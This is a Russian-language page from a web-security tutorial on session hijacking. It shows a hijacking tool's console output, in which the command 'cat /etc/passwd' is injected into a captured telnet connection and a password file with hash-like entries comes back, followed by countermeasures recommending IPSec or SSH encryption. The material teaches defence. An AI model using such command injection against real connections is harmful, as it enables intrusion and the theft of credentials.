Иллюстрированный самоучитель по Secure Web


Захват сеанса - часть 3


---Main Menu--- rcvpkt 76, free/alloc pkt 63/64---

1/w/r) list/watch/reset connections u) host up tests

a)arp/simple hijack (avoids ack storm if arp used)

s) simple hijack

d) daemons rst/arp/sniff/mac

o) options x) exit > s

0) 172.29.11.207 [1517] --> 192.168.40.66

[23] choose conn>0

dump connection y/n [n]>n

dump [s]rc/[d]st/[b]oth [b]>

print src/dst same characters y/n [n]>

Enter the command string you wish executed or [cr]>

cat /etc/passwd cat /etc/passwd

root:rhayrl.AHfasd:0:1:Super-User:/:/sbin/sh daemon:x:

1:1::/: bin:x:2:2::/usr/bin: sys:x:3:3::/

:adm:x:4:4:Admin:/var/adm:

Ip:x:71:8:Line Printer Admin:/usr/spool/lp:

uucp:x:5:5:uucp Admin:/usr/lib/uucp:

nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/

uucp/uucicc listen:x:37:4:Network Admin:/usr/net/nls:

nobody:x:60001:60001:Nobody:/: noaccess:x:60002:60002:

No Access User:/: nobody4:x:65534:65534:SunOS 4.x Nobody:/:

sm:a401ja8fFla.;:100:1::/export/home/sm:/bin/sh

[r]eset connection/[s]ynchronize/[n]one [r]>n

done

Как видно из приведенного примера, на удаленный узел может быть передана довольно коварная команда (cat /etc/passwd), а полученный результат отобразится лишь на компьютере взломщика.

Контрмеры против захвата соединений


Применение шифрующих коммуникационных протоколов, например IPSec или SSH, позволит значительно снизить или свести к нулю эффективность таких перехватов данных. Когда-то считалось, что технология сетей с коммутацией пакетов обеспечивает адекватную защиту от взломов подобного рода, но с тех пор средства сетевого мониторинга стали настолько хитроумными, что при определенных обстоятельствах они позволяют добиться желаемого результата (см. описание утилиты dsnif f в главе 8). Поэтому кодирование информации является самой лучшей защитой.





Начало  Назад  Вперед



Книжный магазин